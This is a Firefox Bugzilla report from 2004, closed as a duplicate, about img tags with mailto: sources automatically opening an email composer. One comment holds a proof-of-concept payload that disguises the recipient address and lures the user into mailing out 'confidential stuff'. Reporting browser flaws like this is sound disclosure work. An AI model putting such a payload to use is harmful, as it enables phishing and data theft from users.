Closed Bug 273986 Opened 20 years ago Closed 20 years ago

when an image link starts with mailto:// a new email message opens automatically

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED DUPLICATE of bug 181860

People

(Reporter: travis.hardiman+bugzilla, Assigned: bugs)

References

(
URL
)

Details

Attachments

(1 file)

<img src="mailto://spacer.gif" />
(deleted), text/html
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 <img src="mailto://spacer.gif" /> will open a new message when loaded in html Reproducible: Always Steps to Reproduce: 1. create a page with <img src="mailto://spacer.gif" /> 2. open in firefox 3. Actual Results: a new email message popped up Expected Results: broken image icon I'll submit a simplified test case. - TH
Attached file <img src="mailto://spacer.gif" /> (deleted) —
when firefox loads the page, a new email message pops up
The reason I marked it security sensitive is because an image like this could be generated with Javascript: <img src="mailto:%22jerk@jerkstore.com______________________________________________________________________________________________________________%22%3Cbiggerjerk@jerksplus.com%3E?subject=Enter%20Contest!&body=Just%20hit%20send%20to%20enter%20contest!%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%5BINSERT_CONFIDENTIAL_STUFF_HERE%5D" alt="jerk@jerkstore.com" /> I have tested this with both Outlook Express and Thunderbird so I don't think the email client is to blame.
Bug 181860 and bug 167475 cover the fact that <img src="mailto:..."> can cause a mailto: URL to open *without user interaction*. Bug 53703 covers mailto: spoofing issues. Your exploit doesn't make sense because if the attacker's JavaScript has access to the user's confidential information, he has better ways to the information back to the attacker than to convince the user to send an e-mail message. *** This bug has been marked as a duplicate of 181860 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
--> Websites :: www.mozilla.com so timeless can close out Firefox :: Product Site.
Component: Product Site → www.mozilla.com
Product: Firefox → Websites
-> Firefox::General (939393)
Component: www.mozilla.com → General
Product: Websites → Firefox
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: